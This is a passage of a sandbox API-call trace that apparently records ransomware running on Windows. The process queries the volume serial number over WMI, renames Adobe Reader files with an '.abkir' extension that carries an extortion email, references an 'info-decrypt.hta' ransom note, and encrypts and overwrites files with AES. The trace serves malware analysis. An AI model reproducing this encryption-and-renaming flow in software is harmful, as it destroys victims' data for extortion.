This=0x601f510, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0159.599] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f510, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60275c0) returned 0x0 [0159.599] WbemLocator:IUnknown:Release (This=0x601f510) returned 0x0 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60275c0) returned 0x0 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0159.599] WbemLocator:IUnknown:AddRef (This=0x60275c0) returned 0x3 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0159.599] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0159.599] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0159.599] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0159.600] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x2 [0159.600] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x1 [0159.600] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0159.600] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0159.600] WbemLocator:IUnknown:QueryInterface (in: This=0x60275c0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60275c0) returned 0x0 [0159.600] WbemLocator:IUnknown:AddRef (This=0x60275c0) returned 0x3 [0159.600] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x2 [0159.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0159.600] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0159.600] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.600] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60275d0) returned 0x0 [0159.600] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60275d0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60330b4) returned 0x0 [0161.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b314) returned 0x0 [0161.449] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b314, pProxy=0x60330b4, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0161.449] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x1 [0161.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b334) returned 0x0 [0161.449] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b314) returned 0x0 [0161.449] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b314, pProxy=0x60330b4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0161.450] WbemLocator:IUnknown:Release (This=0xb5b314) returned 0x2 [0161.450] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x1 [0161.450] CoTaskMemFree (pv=0xbd4a08) [0161.450] WbemLocator:IUnknown:Release (This=0x60275d0) returned 0x0 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0x60330b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b334) returned 0x0 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0161.450] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0161.451] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0161.451] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0161.451] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0161.451] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b294) returned 0x0 [0161.451] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b294, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.451] WbemLocator:IUnknown:Release (This=0xb5b294) returned 0x3 [0161.451] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0161.452] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0161.452] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b31c) returned 0x0 [0161.452] WbemLocator:IRpcOptions:Query (in: This=0xb5b31c, pPrx=0xb5b334, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0161.452] WbemLocator:IUnknown:Release (This=0xb5b31c) returned 0x3 [0161.452] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0161.452] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0161.452] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0161.452] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60330b4) returned 0x0 [0161.452] WbemLocator:IUnknown:AddRef (This=0x60330b4) returned 0x4 [0161.452] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x3 [0161.452] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x2 [0161.452] SysStringLen (param_1=0x0) returned 0x0 [0161.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0161.452] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0161.452] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.452] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0161.452] WbemLocator:IUnknown:AddRef (This=0xb5b334) returned 0x3 [0161.452] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b334, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b334) returned 0x0 [0161.452] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x3 [0161.452] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x2 [0161.452] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0161.452] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.453] IWbemServices:GetObject (in: This=0x60330b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0162.160] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0162.160] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0162.160] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0162.160] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38315c0*=0, plFlavor=0x38315c4*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38315c0*=8, plFlavor=0x38315c4*=0) returned 0x0 [0162.160] SysStringByteLen (bstr="9C354B42") returned 0x10 [0162.160] SysStringByteLen (bstr="9C354B42") returned 0x10 [0162.160] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38315c0*=8, plFlavor=0x38315c4*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x38315c0*=8, plFlavor=0x38315c4*=0) returned 0x0 [0162.160] SysStringByteLen (bstr="9C354B42") returned 0x10 [0162.160] SysStringByteLen (bstr="9C354B42") returned 0x10 [0162.161] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", lpFilePart=0x0) returned 0x34 [0162.161] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0162.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0162.161] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1c508b60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0162.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0162.161] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0162.162] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0162.162] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0162.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0162.162] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0162.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0162.163] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0162.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0162.163] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), fInfoLevelId=0x0, lpFileInformation=0x3831ae0 | out: lpFileInformation=0x3831ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273)) returned 1 [0162.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0162.163] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0162.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0162.163] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0162.164] GetFileType (hFile=0x324) returned 0x1 [0162.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0162.164] GetFileType (hFile=0x324) returned 0x1 [0162.164] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4273 [0162.164] ReadFile (in: hFile=0x324, lpBuffer=0x3831ca0, nNumberOfBytesToRead=0x4273, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x3831ca0*, lpNumberOfBytesRead=0x8f6eedc*=0x4273, lpOverlapped=0x0) returned 1 [0162.166] CloseHandle (hObject=0x324) returned 1 [0162.166] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbdf9d0) returned 1 [0162.168] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x38365d8 | out: pbBuffer=0x38365d8) returned 1 [0163.606] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x36c11b8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f9d0) returned 1 [0163.606] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.606] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.606] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f650) returned 1 [0163.606] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0163.606] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x36c1298*=0x1, dwFlags=0x0) returned 1 [0163.606] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x36c1264, dwFlags=0x0) returned 1 [0163.607] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36c12a8*, pdwDataLen=0x8f6eea8*=0x4280, dwBufLen=0x4280 | out: pbData=0x36c12a8*, pdwDataLen=0x8f6eea8*=0x4280) returned 1 [0163.607] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36c554c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36c554c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0163.608] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0163.608] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0163.608] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0163.609] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", lpFilePart=0x0) returned 0x33 [0163.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0163.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0163.641] GetFileType (hFile=0x4d0) returned 0x1 [0163.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0163.641] GetFileType (hFile=0x4d0) returned 0x1 [0163.641] WriteFile (in: hFile=0x4d0, lpBuffer=0x36c5b48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36c5b48*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0163.642] CloseHandle (hObject=0x4d0) returned 1 [0163.643] CoTaskMemAlloc (cb=0x20c) returned 0xbe2e58 [0163.643] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe2e58 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0163.643] CoTaskMemFree (pv=0xbe2e58) [0163.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0163.643] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0163.643] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0163.643] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0163.643] IUnknown:Release (This=0xb51e34) returned 0x1 [0163.645] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027680) returned 0x0 [0163.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027680, 